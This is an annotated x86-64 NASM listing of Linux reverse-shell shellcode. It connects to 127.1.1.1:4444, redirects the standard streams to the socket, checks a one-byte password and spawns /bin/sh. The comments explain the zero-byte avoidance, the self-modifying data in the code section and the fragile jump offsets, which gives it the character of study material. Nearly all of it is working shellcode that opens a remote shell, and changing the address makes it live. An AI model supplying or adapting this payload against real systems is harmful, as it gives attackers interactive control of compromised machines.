;-----------------------------------------------------------------------
; _start — flat, position-independent x86-64 listing (NASM, Intel syntax)
; Target: Linux, raw syscall ABI (rax = nr; args rdi, rsi, rdx, r10, r8,
;         r9; rcx and r11 are clobbered by `syscall`, all else preserved).
; Flow:   socket -> connect(127.1.1.1:4444) -> dup2 x3 -> read 1 byte ->
;         compare with '|' -> execve("/bin//sh") ; no exit path on failure.
; Registers: r8  = address of rev_data_struct (kept across all syscalls)
;            rdi = socket fd from the first syscall onward
; Notes for the reader:
;   * rev_data_struct is placed in .text and is written at run time
;     (sub at the connect step, read at the password step), so the
;     code page must be writable for this to run as shown.
;   * No syscall return value is checked; a negative (-errno) result
;     from socket() is carried into rdi and into the next `mov al, ..`.
;   * All jumps are hard-coded byte offsets ($+10, $+44); they depend on
;     the exact encoded instruction lengths and break if any
;     instruction is changed or reordered.
;-----------------------------------------------------------------------
global _start
section .text
_start:
; 2-byte short jmp + 8 data bytes = 10: skips over rev_data_struct to `shell`
jmp $+10
; struct sockaddr_in, first 8 bytes only:
;   02 01       sin_family  (byte +1 is patched to 0 below -> 0x0002 = AF_INET)
;   11 5c       sin_port    network byte order, 0x115c = 4444
;   7f 01 01 01 sin_addr    127.1.1.1
; connect() is passed addrlen 16, so the 8 instruction bytes that follow
; this label are handed to the kernel in place of sin_zero.
rev_data_struct: db 0x02, 0x01, 0x11, 0x5c, 0x7f, 0x01, 0x01, 0x01
shell:
; store data struct address in r8
lea r8, [rel rev_data_struct]
; sock = socket(AF_INET, SOCK_STREAM, 0)
; AF_INET = 2
; SOCK_STREAM = 1
; syscall number 41
; each register is zeroed with xor and then only its low byte is set;
; presumably chosen so the encoding holds no zero bytes (the "remove 0x1"
; patch below follows the same idea) — the author does not say
xor rax, rax
mov al, 41
xor rdi, rdi
mov dil, 2
xor rsi, rsi
mov sil, 1
xor rdx, rdx
syscall
; copy socket descriptor to rdi for future use
; (no error check: a -errno return is carried forward as if it were an fd)
mov rdi, rax
; server.sin_family = AF_INET
; server.sin_port = htons(PORT)
; server.sin_addr.s_addr = inet_addr("127.1.1.1")
; bzero(&server.sin_zero, 8)
; remove 0x1 by subtracting: byte +1 of the struct (0x01) becomes 0x00,
; turning the stored sin_family 0x0102 into 0x0002 = AF_INET.
; This writes into .text, hence the writable-code requirement above.
sub byte [r8+1], 0x1
; connect(sock, r8, 16) — syscall 42; only al is set, which assumes the
; socket() result left the upper bytes of rax zero (small fd)
mov al, 42
mov rsi, r8
mov dl, 16                      ; addrlen = sizeof(struct sockaddr_in)
syscall
; duplicate sockets: dup2(sock, n) — syscall 33; rdi is still the fd.
; `mov sil, n` writes only the low byte, so the xor below is what keeps
; the upper bits of rsi zero for all three calls.
; STDIN
mov al, 33
xor rsi, rsi
syscall
; STDOUT
mov al, 33
mov sil, 1
syscall
; STDERR
mov al, 33
mov sil, 2
syscall
; read(sock, r8, 1) — syscall 0: one byte from the socket into the first
; byte of the struct (sin_family's low byte, no longer needed after connect).
; rax must be re-zeroed here because dup2 left its return value in it.
xor rax, rax
lea rsi, [r8]
mov dl, 1
syscall
; check the byte read against the expected password byte '|' (0x7C);
; on mismatch jump 44 bytes forward — the author intends this to land
; past the end of the code so the process faults rather than continuing
; (the landing spot depends on encoded lengths and is not verified here)
cmp byte [rsi], 0x7C
jnz $+44
; execve("/bin//sh", argv, envp) — syscall 59, built on the stack:
;   [rsp] "/bin//sh" NUL  -> rdi (pathname)
;   NULL                  -> rdx (envp: empty environment)
;   &"/bin//sh", NULL     -> rsi (argv)
; First NULL push
xor rax, rax
push rax
; push /bin//sh in reverse (0x2f62696e2f2f7368 little-endian = "/bin//sh")
mov rbx, 0x68732f2f6e69622f
push rbx
; store /bin//sh address in RDI
mov rdi, rsp
; Second NULL push
push rax
; set RDX
mov rdx, rsp
; Push address of /bin//sh
push rdi
; set RSI
mov rsi, rsp
; Call the Execve syscall (rax upper bits are zero from the xor above)
mov al, 59
syscall
; no exit syscall follows: if execve fails, execution runs off the end
; of the listing into whatever bytes come next